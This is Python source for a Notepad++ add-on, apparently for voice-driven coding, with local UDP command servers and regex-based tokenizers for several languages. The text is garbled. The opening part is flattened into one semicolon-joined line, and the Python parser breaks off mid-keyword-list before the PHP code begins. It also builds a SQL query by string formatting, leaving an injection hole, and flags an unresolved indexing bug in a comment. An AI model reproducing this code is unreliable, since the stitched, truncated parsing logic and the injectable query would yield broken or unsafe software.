closest_context = get_closest_match(snippet_context, possible_context_list); if(snippet_context == None): snippet_context = current_lang; sql = "select name from snippet where (context = '%s' or '%s' = 'wildcard')" % (snippet_context, snippet_context); cursor.execute(sql); rows = cursor.fetchall(); snippet_names = []; for fetched_snippet_name in rows: if((fetched_snippet_name[0] != None) and (fetched_snippet_name[0] != "")): snippet_names.append(str(fetched_snippet_name[0]).lower()); snippet_names.sort(); Console.write(console,"DISPLAY-SNIPPETS: %s\n" % snippet_context); snippet_display_string = "\n".join(snippet_names); snippet_display_name_list(snippet_display_string); connection.close(); """ # Roll out a subprocess for the client process. sub = subprocess.Popen(["python","-u","E:\\usr\\nppserve\\npp_client_ka.py"],shell=True,stdin=subprocess.PIPE,stdout=subprocess.PIPE,stderr=subprocess.STDOUT); while(is_running): time.sleep(0.05); #print "Awaiting input..."; raw = sub.stdout.readline(); #print "\n---------\n\ninput read: "+str(raw)+"\n\n"; is_valid, data = cleaner(raw); #print str(data); if(not is_valid): tmp += raw; is_valid, data = cleaner(tmp); if(not is_valid): continue; tmp = ""; msg, props = format_msg(data); cln = cur_line_num(ed); if(("type" not in props) or (props["type"] == "add_text")): indent = "inherit"; if("indent" in props): indent = props["indent"]; lines = msg.replace("\r","").split("\n"); prep = ""; tc = int(ed.getLineIndentation(cln)/4); m = ""; for x in lines: m += prep + x; prep = "\n" + ("\t" * tc); ed.addText(m); elif("type" in props): mtype = props["type"]; if(mtype == "action"): m = msg.split(":"); an = m[0]; rp = 1; if(len(m) > 1): try: rp = int(m[1]); except: rp = 1; if(an in action_map): action_map[an](rp); else: pass; """ #print "Exited loop...\n"; def paste_server(): global end_proc; global paste_port; global paste_send_port; global end_msg; global dsep; global msg_queue; global ksep; send_port = paste_send_port; UDP_IP = 
"127.0.0.1" UDP_PORT = paste_port; r_addr = ""; r_port = 0; sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP sock.bind((UDP_IP, UDP_PORT)) while True: data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes r_addr = addr[0]; r_port = addr[1]; #if(end_proc): # break; #if(data == end_msg): # break; send_msg("ack",send_port); #conn = sqlite3.connect("db\\npp_serve.sqlite3"); #cur = conn.cursor(); d_raw = data.split(dsep); dat = d_raw[0]; props = ""; if(len(d_raw) > 1): props = d_raw[1]; #msg_queue.append([dat,props,0]); try: msg_queue.append([dat,format_props(props),0]); except: pass; #sql = "insert into npp_cmd (data,props,mtype,client_port,client_ip) values (?,?,?,?,?)"; #prep = [dat,props,0,str(r_port),str(r_addr)]; #cur.execute(sql,prep); #conn.commit(); #try: # conn.close(); #except: # pass; #sys.stdout.write("PASTE received message:", data, " : ", addr[0], ":",addr[1]) #sys.stdout.flush() #print "PASTE received message:", data, " : ", addr[0], ":",addr[1] def cmd_server(): global end_proc; global cmd_port; global cmd_send_port; global end_msg; global dsep; global ksep; send_port = cmd_send_port; UDP_IP = "127.0.0.1" UDP_PORT = cmd_port; r_addr = ""; r_port = 0; sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP sock.bind((UDP_IP, UDP_PORT)) while True: data, addr = sock.recvfrom(1024) # buffer size is 1024 bytes r_addr = addr[0]; r_port = addr[1]; #if(end_proc): # break; #if(data == end_msg): # break; send_msg("ack",send_port); #conn = sqlite3.connect("db\\npp_serve.sqlite3"); #cur = conn.cursor(); d_raw = data.split(dsep); dat = d_raw[0]; props = ""; if(len(d_raw) > 1): props = d_raw[1]; try: msg_queue.append([dat,format_props(props),1]); except: pass; #sql = "insert into npp_cmd (data,props,mtype,client_port,client_ip) values (?,?,?,?,?)"; #prep = [dat,props,1,str(r_port),str(r_addr)]; #cur.execute(sql,prep); #conn.commit(); #try: # conn.close(); #except: # pass; #print "CMD received message:", data, " : ", 
addr[0], ":",addr[1] def send_msg(msg,port): UDP_IP = "127.0.0.1" UDP_PORT = port MESSAGE = msg; sock = socket.socket(socket.AF_INET, # Internet socket.SOCK_DGRAM) # UDP sock.sendto(MESSAGE, (UDP_IP, UDP_PORT)) def check_eligible_word(w): if(len(w) < 1): return False; """ if(len(w) < 2): return False; """ try: v = int(w); if(str(v) == w): return False; except: pass; return True; def string_remover(txt,rr): tmp = txt; tmp2 = ""; for x in rr: r = x[0]; g = r.search(tmp); if(g == None): continue; os = -1; oe = -1; ns = 0; try: ns = g.start(); ne = g.end(); tmp2 = tmp[0:ns]; #print tmp[ns:ne]; except: pass; while((g != None) and (os != ns)): os = ns; oe = ne; g = r.search(tmp,ne + 1); if(g == None): break; try: ns = g.start(); ne = g.end(); tmp2 = "%s%s" % (tmp2,tmp[oe:ns]); #print tmp[ns:ne]; #print " ***>>>" except: pass; tmp2 = "%s%s" % (tmp2,tmp[oe:]); tmp = tmp2; return tmp; bm = {}; atom_list = ["var","function","class","token"]; atom_map = {}; lang_list = ["py","php"]; # 'r' | 'u' | 'ur' | 'R' | 'U' | 'UR' | 'Ur' | 'uR' sr = [['[uUrR]*"""[^"\\\\]*(?:(?:\\\\.|"{1,2}(?!"))[^"\\\\]*)*"""','[uUrR]*"""','"""'], ["[uUrR]*'''[^'\\\\]*(?:(?:\\\\.|'{1,2}(?!'))[^'\\\\]*)*'''","[uUrR]*'''","'''"], ['[uUrR]*"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"','[uUrR]*"','"'], ["[uUrR]*'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'","[uUrR]*'","'"]]; ssr = r"""#[.]*"""; py_rr = []; for x in sr: py_rr.append([re.compile(x[0]),re.compile(x[1]),re.compile(x[2])]); py_rr.append([re.compile(ssr,re.VERBOSE),re.compile(ssr,re.VERBOSE),re.compile(r"""[^.]""",re.VERBOSE)]); reg_rr = {}; reg_rr["python"] = py_rr; atom_map["py"] = ["var","function","class","token"]; def parse_py(txt,buff_id): global py_rr; global atom_list; global atom_map; global bm; lang = "py"; if(lang not in bm[buff_id]): bm[buff_id][lang] = {}; bm[buff_id][lang]["alias"] = {} kw = ['and', 'as', 'assert', 'break', 'class', 'continue', 'def', 'del', 'elif', 'else', 'except', 'exec', 'finally', 'for', 'from', 'global', 'if', 'import', 'in', 'is', 
# PHP string literals (double/single quoted).
php_sr = [['"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"', '[uUrR]*"', '"'],
          ["'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'", "[uUrR]*'", "'"]]
# Block comment /* ... */ (VERBOSE: spaces in the pattern are ignored).
ssr = r"""/ \*(([^*])|(\* [^/]))*\* /"""
# FIX: was r"""//[.]*""" — '[.]' matches only literal dots, so '// ...'
# line comments were never stripped.  '//.*' strips to end-of-line.
ssr2 = r"""//.*"""
php_rr = []
for x in php_sr:
    php_rr.append([re.compile(x[0]), re.compile(x[1]), re.compile(x[2])])
php_rr.append([re.compile(ssr, re.VERBOSE), re.compile(r"""/ \*""", re.VERBOSE), re.compile(r"""\* /""", re.VERBOSE)])
php_rr.append([re.compile(ssr2, re.VERBOSE), re.compile(ssr2, re.VERBOSE), re.compile(r"""[^.]""", re.VERBOSE)])
reg_rr["php"] = php_rr
atom_map["php"] = ["var", "function", "class", "token"]


def parse_php(txt, buff_id):
    """Tokenize PHP source (strings/comments stripped) and record vars,
    functions, classes and raw tokens into bm[buff_id]['php']."""
    global php_rr
    global atom_list
    global atom_map
    global bm
    lang = "php"
    if lang not in bm[buff_id]:
        bm[buff_id][lang] = {}
        bm[buff_id][lang]["alias"] = {}
    kw = ['__halt_compiler', 'abstract', 'and', 'array', 'as', 'break',
          'callable', 'case', 'catch', 'class', 'clone', 'const',
          'continue', 'declare', 'default', 'die', 'do', 'echo', 'else',
          'elseif', 'empty', 'enddeclare', 'endfor', 'endforeach',
          'endif', 'endswitch', 'endwhile', 'eval', 'exit', 'extends',
          'final', 'for', 'foreach', 'function', 'global', 'goto', 'if',
          'implements', 'include', 'include_once', 'instanceof',
          'insteadof', 'interface', 'isset', 'list', 'namespace', 'new',
          'or', 'print', 'private', 'protected', 'public', 'require',
          'require_once', 'return', 'static', 'switch', 'throw', 'trait',
          'try', 'unset', 'use', 'var', 'while', 'xor']
    c = "class"
    f = "function"
    vd = ["null", "true", "false"]
    fd = []
    cd = []
    tl = []
    tmp = string_remover(txt, php_rr)
    ss = tmp.split("\n")
    pt = None
    for x in ss:
        y = re.split("[^a-zA-Z0-9_]{1}", x)
        t = []
        pt = None
        for z in y:
            if z != "":
                t.append(z)
                # token after 'function'/'class' is a function/class name
                if pt != None:
                    if (pt == f) and (z not in fd):
                        fd.append(z)
                    elif (pt == c) and (z not in cd):
                        cd.append(z)
                if (z not in tl) and (z not in kw):
                    tl.append(z)
                pt = z
    for x in tl:
        if (x not in fd) and (x not in cd) and (x not in vd) and check_eligible_word(x):
            vd.append(x)
    cm = {"var": vd, "function": fd, "class": cd, "token": tl}
    if lang in atom_map:
        for x in atom_map[lang]:
            if x in cm:
                bm[buff_id][lang][x] = cm[x]
# HTML memtypes: 0)tag 1)attr 2)class 3)id (+ name).
# Attribute-value extractors for id= / name= / class= in either quote style.
id_r = "%s|%s" % ('(id="([^"\\\\]*(?:\\\\.[^"\\\\]*)*)")', "(id='([^'\\\\]*(?:\\\\.[^'\\\\]*)*)')")
name_r = "%s|%s" % ('(name="([^"\\\\]*(?:\\\\.[^"\\\\]*)*)")', "(name='([^'\\\\]*(?:\\\\.[^'\\\\]*)*)')")
class_r = "%s|%s" % ('(class="([^"\\\\]*(?:\\\\.[^"\\\\]*)*)")', "(class='([^'\\\\]*(?:\\\\.[^'\\\\]*)*)')")
html_sr = [
    [id_r, '.', '.'],
    [name_r, '.', '.'],
    [class_r, ".", "."],
]
html_rr = []
for x in html_sr:
    html_rr.append([re.compile(x[0]), re.compile(x[1]), re.compile(x[2])])
reg_rr["html"] = html_rr
atom_map["html"] = ["tagname", "attribute", "css_class", "id", "name"]


def parse_html(txt, buff_id):
    """Scan HTML source for id/name/class attribute values and record
    them (plus built-in tag/attribute vocabularies and speech aliases)
    into bm[buff_id]['html']."""
    global html_rr
    global atom_list
    global atom_map
    global bm
    lang = "html"
    if lang not in bm[buff_id]:
        bm[buff_id][lang] = {}
        bm[buff_id][lang]["alias"] = {}
    # spoken alias -> tag name
    va = {"anchor": "a", "unordered": "ul", "ordered": "ol", "listitem": "li", "image": "img", "panel": "div", "row": "tr", "column": "td", "tablerow": "tr"}
    vd = ["div", "a", "li", "html", "body", "head", "title", "table", "tr", "td", "input", "textarea", "button", "iframe", "ul", "li", "img", "meta", "script", "span", "label"]  # tag name
    fa = {"linkref": "href", "reference": "href", "relative": "rel", "source": "src"}
    fd = ["width", "height", "style", "onclick", "href", "rel", "class", "id", "src", "type"]  # attribute
    cd = []  # css class
    tl = []  # id
    nl = []  # name
    id_r = html_rr[0][0]
    name_r = html_rr[1][0]
    class_r = html_rr[2][0]
    # slice offsets skip the attribute prefix (id="/name="/class") and
    # the trailing quote
    tmp = id_r.search(txt)
    while tmp != None:
        ss = tmp.start()
        se = tmp.end()
        raw = txt[ss+4:se-1]
        if raw not in tl:
            tl.append(raw)
        tmp = id_r.search(txt, se+1)
    tmp = name_r.search(txt)
    while tmp != None:
        ss = tmp.start()
        se = tmp.end()
        raw = txt[ss+6:se-1]
        if raw not in nl:
            nl.append(raw)
        tmp = name_r.search(txt, se+1)
    tmp = class_r.search(txt)
    while tmp != None:
        ss = tmp.start()
        se = tmp.end()
        raw = txt[ss+7:se-1]
        # class may hold several space-separated names
        y = re.split("[^a-zA-Z0-9_]{1}", raw)
        for x in y:
            if (x != "") and (x not in cd):
                cd.append(x)
        tmp = class_r.search(txt, se+1)
    cm = {"tagname": vd, "attribute": fd, "css_class": cd, "id": tl, "name": nl}
    ca = {"tagname": va, "attribute": fa, "css_class": {}, "id": {}, "name": {}}
    if lang in atom_map:
        for x in atom_map[lang]:
            if x in cm:
                bm[buff_id][lang][x] = cm[x]
                bm[buff_id][lang]["alias"][x] = ca[x]


xml_sr = [
    [id_r, '.', '.'],
    [name_r, '.', '.'],
    [class_r, ".", "."],
]
xml_rr = []
for x in xml_sr:
    xml_rr.append([re.compile(x[0]), re.compile(x[1]), re.compile(x[2])])
reg_rr["xml"] = xml_rr
atom_map["xml"] = ["tagname", "attribute", "css_class", "id", "name"]


def parse_xml(txt, buff_id):
    """Scan XML source for id/name/class attribute values and tag names
    (via lxml) and record them into bm[buff_id]['xml']."""
    global xml_rr
    global atom_list
    global atom_map
    global bm
    lang = "xml"
    if lang not in bm[buff_id]:
        bm[buff_id][lang] = {}
        bm[buff_id][lang]["alias"] = {}
    va = {}
    vd = []  # tag name
    fa = {"linkref": "href", "reference": "href", "relative": "rel", "source": "src"}
    fd = ["width", "height", "style", "href", "rel", "class", "id", "src", "type"]  # attribute
    cd = []  # css class
    tl = []  # id
    nl = []  # name
    # use the xml copies of the extractors (identical patterns;
    # previously read from html_rr by copy-paste)
    id_r = xml_rr[0][0]
    name_r = xml_rr[1][0]
    class_r = xml_rr[2][0]
    tmp = id_r.search(txt)
    while tmp != None:
        ss = tmp.start()
        se = tmp.end()
        raw = txt[ss+4:se-1]
        if raw not in tl:
            tl.append(raw)
        tmp = id_r.search(txt, se+1)
    tmp = name_r.search(txt)
    while tmp != None:
        ss = tmp.start()
        se = tmp.end()
        raw = txt[ss+6:se-1]
        if raw not in nl:
            nl.append(raw)
        tmp = name_r.search(txt, se+1)
    tmp = class_r.search(txt)
    while tmp != None:
        ss = tmp.start()
        se = tmp.end()
        raw = txt[ss+7:se-1]
        y = re.split("[^a-zA-Z0-9_]{1}", raw)
        for x in y:
            if (x != "") and (x not in cd):
                cd.append(x)
        tmp = class_r.search(txt, se+1)
    try:
        xml = etree.XML(txt)
        for c in xml.xpath("//*"):
            if c.tag not in vd:
                vd.append(c.tag)
    except:
        pass
    cm = {"tagname": vd, "attribute": fd, "css_class": cd, "id": tl, "name": nl}
    ca = {"tagname": va, "attribute": fa, "css_class": {}, "id": {}, "name": {}}
    if lang in atom_map:
        for x in atom_map[lang]:
            if x in cm:
                bm[buff_id][lang][x] = cm[x]
                bm[buff_id][lang]["alias"][x] = ca[x]


css_sr = [
    ["", '.', '.'],
    ["", ".", "."],
]
css_rr = []
for x in css_sr:
    # FIX: previously appended to html_rr (which reg_rr["html"] aliases),
    # polluting the html pattern list and leaving css_rr/reg_rr["css"] empty.
    css_rr.append([re.compile(x[0]), re.compile(x[1]), re.compile(x[2])])
reg_rr["css"] = css_rr
atom_map["css"] = ["tagname", "property", "value", "css_class", "id", "pseudo"]
tcss_parser = tinycss.make_parser("page3")


def parse_css(txt, buff_id):
    """Parse a stylesheet with tinycss, collecting #ids and .class names
    from rule selectors, and record them (plus built-in tag/property/value
    vocabularies) into bm[buff_id]['css']."""
    global css_rr
    global atom_list
    global bm
    global tcss_parser
    lang = "css"
    if lang not in bm[buff_id]:
        bm[buff_id][lang] = {}
        bm[buff_id][lang]["alias"] = {}
    ta = {"anchor": "a", "unordered": "ul", "ordered": "ol", "listitem": "li", "image": "img", "panel": "div", "row": "tr", "column": "td", "tablerow": "tr"}
    td = ["div", "a", "li", "html", "body", "head", "title", "table", "tr", "td", "input", "textarea", "button", "iframe", "ul", "li", "img", "meta", "script", "span", "label"]  # tag name
    aa = {}
    ad = ["width", "height", "min-width", "min-height", "float", "clear", "position", "background", "background-color", "background-repeat", "background-position", "border", "border-top", "border-right", "border-bottom", "border-left", "margin", "margin-top", "margin-right", "margin-bottom", "margin-left", "padding", "padding-top", "padding-right", "padding-bottom", "padding-left", "line-height", "font", "font-family", "font-style", "font-size", "font-weight", "text-decoration", "color", "cursor", "text-shadow", "display", "vertical-align", "display", "list-style-type"]  # style property
    va = {}
    vd = ["Arial", "Helvetica", "sans-serif", "left", "center", "right", "auto", "bold", "none", "no-repeat", "repeat-x", "repeat-y", "repeat", "top", "url()", "solid", "!important", "block", "disc", "inline", "underline", "italic", "both", "relative", "absolute", "decimal", "pointer"]  # property value
    cd = []  # css class
    tl = []  # id
    pl = ["active", "visited", "hover", "focus", "first-letter", "first-line", "first-child", "before", "after"]  # pseudo
    # parse out all the rules, collecting IDs and class names along the way.
    p = tcss_parser.parse_stylesheet(txt)
    mod = None
    for x in p.rules:
        for y in x.selector:
            try:
                if (y.type.lower() == "ident") and (mod != None):
                    # FIX: mod was reset to None BEFORE being tested, so
                    # ids/classes were never collected; consume it first.
                    v = y.value
                    if mod == 0:
                        if v not in tl:
                            tl.append(v)
                    elif mod == 1:
                        if v not in cd:
                            cd.append(v)
                    mod = None
                elif y.value == "#":
                    mod = 0  # next ident is an id
                elif y.value == ".":
                    mod = 1  # next ident is a class
                else:
                    mod = None
            except:
                pass
    cm = {"tagname": td, "property": ad, "value": vd, "css_class": cd, "id": tl, "pseudo": pl}
    ca = {"tagname": ta, "property": aa, "value": va, "css_class": {}, "id": {}, "pseudo": {}}
    if lang in atom_map:
        for x in atom_map[lang]:
            if x in cm:
                bm[buff_id][lang][x] = cm[x]
                bm[buff_id][lang]["alias"][x] = ca[x]
# JavaScript string literals (double/single quoted).
js_sr = [['"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"', '', ''],
         ["'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'", "", ""]]
# Block comment /* ... */ (VERBOSE: spaces in the pattern are ignored).
ssr = r"""/ \*(([^*])|(\* [^/]))*\* /"""
# FIX: was r"""//[.]*""" — '[.]' matches only literal dots, so '// ...'
# line comments were never stripped.  '//.*' strips to end-of-line.
ssr2 = r"""//.*"""
js_rr = []
for x in js_sr:
    js_rr.append([re.compile(x[0]), re.compile(x[1]), re.compile(x[2])])
js_rr.append([re.compile(ssr, re.VERBOSE), re.compile(r"""/ \*""", re.VERBOSE), re.compile(r"""\* /""", re.VERBOSE)])
js_rr.append([re.compile(ssr2, re.VERBOSE), re.compile(ssr2, re.VERBOSE), re.compile(r"""[^.]""", re.VERBOSE)])
reg_rr["javascript"] = js_rr
atom_map["js"] = ["var", "function", "class", "token"]


def parse_js(txt, buff_id):
    """Tokenize JavaScript source (strings/comments stripped) and record
    vars, functions and raw tokens into bm[buff_id]['js']."""
    global js_rr
    global atom_list
    global atom_map
    global bm
    lang = "js"
    if lang not in bm[buff_id]:
        bm[buff_id][lang] = {}
        # consistency: every other parser initializes the alias map on
        # first creation; parse_js previously skipped it
        bm[buff_id][lang]["alias"] = {}
    kw = ["break", "case", "catch", "continue", "debugger", "default",
          "delete", "do", "else", "finally", "for", "function", "if",
          "in", "instanceof", "new", "return", "switch", "this", "throw",
          "try", "typeof", "var", "void", "while", "with"]
    f = "function"
    vd = ["null", "true", "false"]
    fd = []
    cd = []
    tl = []
    tmp = string_remover(txt, js_rr)
    ss = tmp.split("\n")
    pt = None
    for x in ss:
        y = re.split("[^a-zA-Z0-9_]{1}", x)
        t = []
        pt = None
        for z in y:
            if z != "":
                t.append(z)
                # token after 'function' is a function name
                if pt != None:
                    if (pt == f) and (z not in fd):
                        fd.append(z)
                if (z not in tl) and (z not in kw):
                    tl.append(z)
                pt = z
    for x in tl:
        if (x not in fd) and (x not in cd) and (x not in vd) and check_eligible_word(x):
            vd.append(x)
    cm = {"var": vd, "function": fd, "class": cd, "token": tl}
    if lang in atom_map:
        for x in atom_map[lang]:
            if x in cm:
                bm[buff_id][lang][x] = cm[x]


# C/C++ string literals (double/single quoted).
cpp_sr = [['"([^"\\\\]*(?:\\\\.[^"\\\\]*)*)"', '[uUrR]*"', '"'],
          ["'([^'\\\\]*(?:\\\\.[^'\\\\]*)*)'", "[uUrR]*'", "'"]]
ssr = r"""/ \*(([^*])|(\* [^/]))*\* /"""
ssr2 = r"""//.*"""
cpp_rr = []
for x in cpp_sr:
    cpp_rr.append([re.compile(x[0]), re.compile(x[1]), re.compile(x[2])])
cpp_rr.append([re.compile(ssr, re.VERBOSE), re.compile(r"""/ \*""", re.VERBOSE), re.compile(r"""\* /""", re.VERBOSE)])
cpp_rr.append([re.compile(ssr2, re.VERBOSE), re.compile(ssr2, re.VERBOSE), re.compile(r"""[^.]""", re.VERBOSE)])
# FIX: was reg_rr["c"] = php_rr (copy-paste) — the cpp_rr list built
# above was never used.
reg_rr["c"] = cpp_rr
atom_map["c"] = ["var", "function", "class", "token"]
def parse_cpp(txt, buff_id):
    """Tokenize C/C++ source (strings/comments stripped) and record vars,
    classes and raw tokens into bm[buff_id]['c']."""
    global cpp_rr
    global atom_list
    global atom_map
    global bm
    lang = "c"
    if lang not in bm[buff_id]:
        bm[buff_id][lang] = {}
        bm[buff_id][lang]["alias"] = {}
    kw = ['alignas', 'alignof', 'and', 'and_eq', 'asm', 'auto', 'bitand',
          'bitor', 'bool', 'break', 'catch', 'char', 'char16_t',
          'char32_t', 'class', 'compl', 'const', 'constexpr',
          'const_cast', 'continue', 'decltype', 'default', 'delete',
          'do', 'double', 'dynamic_cast', 'else', 'enum', 'explicit',
          'export', 'extern', 'float', 'for', 'friend', 'goto', 'if',
          'int', 'long', 'mutable', 'namespace', 'new', 'noexcept',
          'not', 'not_eq', 'nullptr', 'namespace', 'new', 'operator',
          'or', 'or_eq', 'private', 'protected', 'public', 'register',
          'reinterpret_cast', 'return', 'short', 'signed', 'sizeof',
          'static', 'static_assert', 'static_cast', 'struct', 'switch',
          'template', 'this', 'thread_local', 'throw', 'true', 'try',
          'typedef', 'typeid', 'typename', 'union', 'unsigned', 'using',
          'virtual', 'void', 'volatile', 'wchar_t', 'while', 'xor',
          'xor_eq']
    c = "class"
    f = ""
    vd = ["null", "true", "false"]
    fd = []
    cd = []
    tl = []
    # FIX: was string_remover(txt, php_rr) (copy-paste) — use the C/C++
    # pattern list built for this parser.
    tmp = string_remover(txt, cpp_rr)
    ss = tmp.split("\n")
    pt = None
    for x in ss:
        y = re.split("[^a-zA-Z0-9_]{1}", x)
        t = []
        pt = None
        for z in y:
            if z != "":
                t.append(z)
                if pt != None:
                    # function detection disabled (f == ""); only classes
                    if (pt == c) and (z not in cd):
                        cd.append(z)
                if (z not in tl) and (z not in kw):
                    tl.append(z)
                pt = z
    for x in tl:
        if (x not in fd) and (x not in cd) and (x not in vd) and check_eligible_word(x):
            vd.append(x)
    cm = {"var": vd, "function": fd, "class": cd, "token": tl}
    if lang in atom_map:
        for x in atom_map[lang]:
            if x in cm:
                bm[buff_id][lang][x] = cm[x]


def in_range(range_list, start, end):
    """Return True if [start, end] overlaps (or shares an endpoint with)
    any [lo, hi] pair in range_list."""
    for r in range_list:
        if (((r[0] <= start) and (r[1] >= start)) or
                ((start <= r[0]) and (end >= r[0])) or
                (start == r[0]) or (end == r[1])):
            return True
    return False


def isolate_source(src, ttype, targ_rr, tag_list=[["<?php", "?>"]], cpos=0):
    """Blank out either the script regions (type 0) or everything outside
    them (type 1) in a mixed-language file, preserving line/char counts
    (non-newline chars become spaces).  ttype 2 auto-selects based on
    whether cpos sits inside a script region.  targ_rr lists regexes for
    excluded spans (strings/comments) whose tag occurrences are ignored.
    Returns (resolved_type, blanked_source)."""
    result = ""
    range_list = []
    type = ttype
    # Get ranges at which excluded elements (regexes in targ_rr) occur.
    for r in targ_rr:
        tr = []
        st = 0
        os = -1
        while os != st:
            os = st
            s = r[0].search(src, st)
            if s == None:
                break
            st = s.end() + 1
            tr.append([s.start(), s.end()])
        # merge the ranges
        tx = []
        for x in tr:
            found = False
            for y in range_list:
                # if ranges overlap, combine them
                if (((x[0] <= y[0]) and (x[1] >= y[0])) or
                        ((y[0] <= x[0]) and (y[1] >= x[0])) or
                        (y[0] == x[0]) or (y[1] == x[1])):
                    xs = x[0]
                    if y[0] < x[0]:
                        xs = y[0]
                    xe = x[1]
                    if y[1] > x[1]:
                        xe = y[1]
                    y[0] = xs
                    y[1] = xe
                    found = True
                    break
            if not found:
                tx.append(x)
        for x in tx:
            range_list.append(x)
    # Locate open/close tag pairs that are NOT inside excluded ranges.
    tg_range = []
    src_len = len(src)
    for tg in tag_list:
        ts = 0
        tgm = 0  # 0 = looking for opener, 1 = looking for closer
        tgl = [len(tg[0]), len(tg[1])]
        tmp = src.find(tg[tgm])
        while tmp != -1:
            if not in_range(range_list, tmp, tmp + tgl[tgm]):
                if tgm == 0:
                    tgm = 1
                    ts = tmp
                else:
                    tgm = 0
                    tg_range.append([ts, tmp + tgl[1]])
            tmp = src.find(tg[tgm], tmp + tgl[tgm])
        # unterminated open tag runs to end of file
        if (tgm == 1) and (ts != src_len):
            tg_range.append([ts, src_len])
    # Sort the script region occurrences (assuming no overlap).
    t_range = []
    for t in tg_range:
        pos = len(t_range)
        for i in range(0, pos):
            y = t_range[i]
            if y[0] >= t[0]:
                pos = i
                break
        t_range.insert(pos, t)
    # ttype 2: pick 1 if the caret is inside a script region, else 0.
    if type == 2:
        type = 0
        for x in t_range:
            if (cpos >= x[0]) and (cpos < x[1]):
                type = 1
                break
    if type == 0:
        # remove the script regions without affecting char/line count
        result = src
        while len(t_range) > 0:
            t = t_range[0]
            t_range.pop(0)
            tl = t[1] - t[0]
            result = "%s%s%s" % (result[0:t[0]], re.sub(r"[^\n]{1}", r" ", result[t[0]:t[1]]), result[t[1]:])
    else:
        # reverse the ranges and blank everything OUTSIDE script regions
        x_range = []
        ts = 0
        sl = len(src)
        for t in t_range:
            if ts < (t[0] - 1):
                x_range.append([ts, t[0] - 1])
            ts = t[1]
        if ts < sl:
            x_range.append([ts, sl])
        result = src
        while len(x_range) > 0:
            t = x_range[0]
            x_range.pop(0)
            tl = t[1] - t[0]
            result = "%s%s%s" % (result[0:t[0]], re.sub(r"[^\n]{1}", r" ", result[t[0]:t[1]]), result[t[1]:])
    return (type, result.replace("\r", " "))


def trim_lead(s, delim):
    """Strip leading chars found in delim; None if s is all-delimiter."""
    d = delim
    sl = len(s)
    for i in range(0, sl):
        x = s[i]
        if x not in delim:
            return s[i:]
    return None


global err_msg
err_msg = ""


def get_tag_range_list(src, type=0, cpos=0):
    """Classify src as XML (return 0), non-markup (-1), or HTML; for HTML
    return [[script ranges], [style ranges]] as char offsets.  With
    type == 1, instead return the tag name ('script'/'style') containing
    cpos, or None."""
    global err_msg
    xml = None
    ttype = 0  # 0 = xml
    tags = ["script", "style"]
    html_range = ["html", "div", "p", "span", "tr", "td", "table"]
    tsrc = src
    try:
        tsrc = src.replace("<?php", " ").replace("?>", " ").replace("&nbsp;", " ")
        xml = etree.XML(tsrc)
    except Exception as e:
        err_msg = "%s\n" % e
        success = False
        try:
            xml = etree.HTML(tsrc)
            success = True
        except:
            pass
        if not success:
            try:
                tsrc = trim_lead(tsrc, [" ", "\t", "\n", "\r"])
                xml = etree.XML(tsrc)
                if xml.tag.lower() not in html_range:
                    return 0
                else:
                    return -1
            except:
                return -1
            return -1  # failure
    try:
        if xml.tag.lower() in html_range:
            ttype = 1  # html
        else:
            return 0
    except:
        return 0
    range_list = []
    try:
        for tagname in tags:
            x_range = []
            range_list.append(x_range)
            ti = xml.getiterator(tagname)
            ssp = src.split("\n")
            for t in ti:
                sl = t.sourceline
                # Find where the tag ends: iterate siblings, move up to
                # parent, repeat until found or docroot (use end of file).
                tmp = t.getparent()
                ln = None
                lns = 0
                x = 0
                # char offset of the tag's source line
                for i in range(0, sl-1):
                    if i >= len(ssp):
                        x = len(src)
                        break
                    x += len(ssp[i]) + 1
                ln2 = x
                ssf = src.find(tagname, ln2)
                ssf = src.find(">", ssf)
                if type == 1:
                    if ssf > cpos:
                        break  # not in range; try the next tag
                while tmp != None:
                    si = t.itersiblings()
                    for x in si:
                        ln = x.sourceline
                        break
                    if ln != None:
                        break
                    tmp = tmp.getparent()
                if ln == None:
                    ln = len(src)
                else:
                    x = 0
                    for i in range(0, ln-1):
                        if i >= len(ssp):
                            x = len(src)
                            break
                        # NOTE(review): indexes tmp (the parent element's
                        # children) where ssp (source lines) looks intended —
                        # preserved as-is; confirm before changing.
                        if len(tmp) > i:
                            x += len(tmp[i]) + 1
                    ln = x
                loc = ssf + (src[ssf:ln].rfind(tagname) - 1)
                if type == 1:
                    if (cpos >= ssf) and (cpos < loc):
                        return tagname
                x_range.append([ssf, loc])
        if type == 1:
            return None
    except Exception as e:
        err_msg = "[Line #%s]: %s\n" % (str(traceback.tb_lineno(sys.exc_traceback)), e)
        if type == 1:
            return None
        return -1
    return range_list
current_buffid = None

# Read the autolang flag; on any failure try to (re)write it as enabled.
try:
    f = open(serv_path + "\\grammar\\autolang.txt", "r+")
    line = f.readline()
    f.close()
    line = line.replace("\r", "").replace("\n", "")
    if int(line) != 1:
        auto_lang = False
except:
    try:
        f = open(serv_path + "\\grammar\\autolang.txt", "r+")
        f.write("1")
        f.flush()
        f.close()
    except:
        pass


def auto_lang_detect():
    """Work out which language the caret currently sits in (handling
    mixed PHP/HTML/JS/CSS files), optionally switch the active grammar
    context, and return a list of [language, source] pairs to parse."""
    global current_buffid
    global auto_lang
    global lang_list
    global reg_rr
    global current_lang
    global serv_path
    global err_msg
    default_lang = "python"
    cbid = Notepad.getCurrentBufferID(notepad)
    ext = None
    # extension -> language, and languages with embedded-region markers
    d = {"python": ["py"], "php": ["php"], "html": ["html", "htm"], "css": ["css"], "javascript": ["js"], "xml": ["xml"], "c": ["cpp", "c", "h", "hpp"]}
    ml = {"php": [["<?php", "?>"], ["<?", "?>"]]}
    cur_lang = default_lang
    first_time = (current_buffid != cbid)
    fn = Notepad.getCurrentFilename(notepad)
    fns = fn.split(".")
    fnsl = len(fns)
    current_buffid = cbid
    if fnsl < 2:
        ext = default_lang
    else:
        ext = fns[fnsl - 1]
    found = False
    for k in d:
        if ext in d[k]:
            found = True
            ext = k
            break
    if not found:
        ext = default_lang
    src_lt = []
    # Check the caret position for mixed language files
    # (e.g. PHP files often contain html).
    if (ext in ml) and (ext in reg_rr):
        cpos = ed.getCurrentPos()
        src = editor.getText()
        type = 0
